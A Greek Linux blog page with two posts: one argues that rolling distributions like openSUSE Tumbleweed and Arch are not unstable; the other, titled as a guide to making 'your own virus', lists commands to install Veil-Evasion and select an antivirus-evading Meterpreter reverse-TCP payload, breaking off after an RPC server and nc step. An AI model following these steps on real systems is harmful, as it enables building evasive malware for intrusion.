read more

Τετάρτη, 25 Ιανουαρίου 2017

Μυθος περι bleeding edge διανομες και κατεστραμμενα συστηματα...

Ερέθισμα για την ανάπτυξη του θέματος ήταν κάποιες αναρτήσεις περί openSUSE Tumbleweed στο Facebook. Συγκεκριμένα κάποιος είχε απαντήσει για bleeding edge διανομή που θα καταλήξει σε κατεστραμμένο σύστημα. Όπως έχω περιγράψει και στο άρθρο Μύθος: οι rolling διανομές είναι ασταθείς, δεν ισχύει κάτι τέτοιο, τουλάχιστον όσο μου έχει δείξει η εμπειρία μου.


Λίγα εισαγωγικά για εμένα, για όσους δεν με γνωρίζετε. Το επάγγελμά μου έχει να κάνει με ιατρική και ασχολούμαι με το ελεύθερο λογισμικό από χόμπι. Πέρασα από διανομές (και κοινότητες) Ubuntu, Fedora, openSUSE, Arch (και άλλες). Η χρήση που κάνω, θεωρώ καλύπτει τον μέσο χρήστη. Επικοινωνία με mail αλλά και με messangers, λίγο ιντερνετ (πληροφορίες και βίντεο), διαβάζω και γράφω κάποια έγγραφα. Αυτά πάνω κάτω, άντε και ότι πειράματα κάνω με τις πλακέτες ARM.

Λίγα λόγια για τους ορισμούς. Bleeding edge θεωρείται ένα λογισμικό (αλλά και hardware) τόσο νέο που υπάρχει ρίσκο από την χρήση του (μιας και δεν είναι τόσο δοκιμασμένο και διορθωμένο όσο παλαιότερες εκδόσεις). Πάνω κάτω αυτός είναι ο ορισμός αυτής της τεχνολογίας που θα την δείτε και ως "leading edge" και "cutting edge". Υπάρχει η φήμη ότι όλες οι κυλιόμενες εκδόσεις διανομών (rolling) καθώς και η διανομή Fedora είναι bleeding edge, έχει ρίσκο η χρήση τους καθώς καταλήγετε με κατεστραμμένο σύστημα.

Το παραπάνω αποτελεί τεράστιο μύθο. Από την εμπειρία μου και τα γεγονότα:

1. Fedora: Χρησιμοποίησα γύρω στις εκδόσεις 12-15 (αν δεν κάνω λάθος). Πολλοί φίλοι μου λέγαν ότι θα μου "σκάσει" το σύστημα. Σύντομα θα πάρω τον υπολογιστή μου στα χέρια. Θα χρειαστεί να κάνω ξανά εγκατάσταση άλλη διανομή. Η αλήθεια είναι ότι με την χρήση που έκανα, δεν υπήρξε κανένα πρόβλημα. Μια χαρά σταθερό σύστημα είχα. Το μόνο πρόβλημα που αντιμετώπισα (ίσως να υπάρχει ακόμα αλλά το συνάντησα και στο Ubuntu που είχα πριν) ήταν η αναβάθμιση από την μια έκδοση στην άλλη. Κατέληγα με πάρα πολύ αργό σύστημα. Οπότε τότε μια φρέσκια εγκατάσταση, έλυνε το πρόβλημα της ταχύτητας αλλά επικρατούσε βαρεμάρα μέχρι να στηθεί.

2. openSUSE: Με χρονολογική σειρά είναι η αμέσως επόμενη διανομή που χρησιμοποίησα. Επειδή ασχολούμαι και με την μετάφραση του GNOME, θέλησα να έχω τελευταία έκδοση του GNOME για να βλέπω τα σφάλματα των μεταφράσεων και να διορθώνω. Γι'αυτό το λόγο παράλληλα εγκατέστησα και Arch Linux. Όμως με την διέλευση της έκδοσης Tumbleweed τα πράγματα άλλαξαν. Μπορούσα να έχω και εγώ στο openSUSE την τελευταία έκδοση. Μάλιστα στην έκδοση 3.22, η Tumbleweed έβαλε πρώτη το GNOME διότι οι developers βοηθήσανε upstream την ανάπτυξη του GNOME. Γιατί συνέβη αυτό; Γιατί περάσανε από το openqa. Τι είναι αυτό; Είναι ένα αυτοματοποιημένο σύστημα ελέγχου ποιότητας των πακέτων. Είναι κάποια τεστάκια που γράφουν οι προγραμματιστές, υπεύθυνοι για τις εκδόσεις. Εάν τα υποψήφια πακέτα προς κυκλοφορία-εισαγωγή στην έκδοση Tumbleweed περάσουν τα τεστάκια, τότε μεταφέρονται στο αποθετήριο Tumbleweed. Εάν αποτύχουν, γυρνάνε πίσω στο αποθετήριο factory και τους προγραμματιστές αυτών για να κάνουν διορθώσεις. Επομένως η τελική έκδοση Tumbleweed που είναι σε κυκλοφορία είναι σταθερή έκδοση. Θα μου πείτε, καλά ρε μεγάλε, με τόσο καλά λόγια, μια σταθερή έκδοση rolling, δεν έχει bugs στο bugzilla κλπ; Σίγουρα θα έχει, σε νορμάλ πλαίσια όμως, όπως έχουν όλες οι διανομές.

3. Arch Linux: Όπως ανέφερα, την εγκατέστησα για να έχω το τελευταίο GNOME που κυκλοφορεί. Από τότε που το εγκατέστησα, ακόμα δουλεύει με μεγάλες αναβαθμίσεις από μια έκδοση GNOME στην επόμενη. Εκεί είναι που λένε όλοι ότι το σύστημά σου θα σου χαλάσει. Όσον αφορά το GNOME (φαντάζομαι κάτι αντίστοιχο ισχύει και με άλλα πακέτα), όταν κυκλοφορεί επίσημα από την κοινότητα GNOME, οι administrators το εισάγουν σε αποθετήριο testing. Εκεί η κοινότητα το δοκιμάζει μέχρι να είναι σίγουρη ότι δεν θα εμφανίσει σφάλματα. Όταν βγει επίσημα η .1 έκδοση από την κοινότητα GNOME (Χ.ΧΧ.1), τότε οι διαχειριστές μεταφέρουν από το testing αποθετήριο στο σταθερό αποθετήριο της διανομής. Η κοινότητα GNOME κυκλοφορεί αυτή την έκδοση μετά από 1 μήνα περίπου.

ΕΠΙΛΟΓΟΣ
Από τα παραπάνω συμπεραίνουμε ότι rolling διανομές που θεωρούνται bleeding edge δεν αποτελούν μαύρο πανί για τους νέους και τελικούς χρήστες. Δεν πρόκειται για ατεστάριστα προγράμματα που εισάγονται μόνο και μόνο για να θεωρεί η κοινότητα της διανομής ότι τα εισήγαγε, στηριζόμενη στον παράγοντα τύχη (αν σου κάτσει να είναι σταθερά τότε είμαστε κομπλέ). Είναι φήμες που ίσχυαν παλιά και ίσως να διαδίδονται και από παλαιούς χρήστες που δεν έχουν δοκιμάσει (για πολλές μέρες) άλλη διανομή εκτός από την βασική που έχουν ξεκινήσει (είτε Ubuntu λέγεται, είτε Linux Mint, είτε Debian). Επειδή δεν είμαι προγραμματιστής, δεν μπορώ να σας πω αν μπορεί να βολέψει και σε αυτούς (αν και στο Internet διαβάζω ότι είναι οι κατάλληλες διανομές για ανάπτυξη). Επίσης δεν είμαι sysadmin για να ξέρω (αν και νομίζω η επιλογή γίνεται με άλλα κριτήρια). ΜΗΝ φοβάστε να προτείνετε τέτοιες διανομές σε τελικούς χρήστες που θα περιορίζονται στην χρήση του υπολογιστή όπως κάνω εγώ.
read more

Κυριακή, 15 Ιανουαρίου 2017

PARROT-Linux/Kali-Linux:Ετοίμασε τον δικό σου ιο με το Veil Evasion

1.
[root@parrot]─[~]
└──╼ #apt-get -y install git

2.
 [root@parrot]─[~]
└──╼ #git clone https://github.com/Veil-Framework/Veil-Evasion.git

3.
 [root@parrot]─[~]
└──╼ #cd Veil-Evasion/

4.
 [root@parrot]─[~/Veil-Evasion]
└──╼ #cd setup

5.
 [root@parrot]─[~/Veil-Evasion/setup]
└──╼ #ls
 6.
 [root@parrot]─[~/Veil-Evasion/setup]
└──╼ #./setup.sh

 7.

 [root@parrot]─[~]
└──╼ #Veil-Evasion

 8.

[menu>>]: list
[menu>>]: use python/meterpreter/rev_tcp

 9.

 First Terminal

 [root@parrot]─[~/Veil-Evasion]
└──╼ #./Veil-Evasion.py --rpc

 10.

 [*] Starting Veil-Evasion RPC server...


 11.

 Second Terminal

 [root@parrot]─[~]
└──╼ #nc 127.0.0.1



read more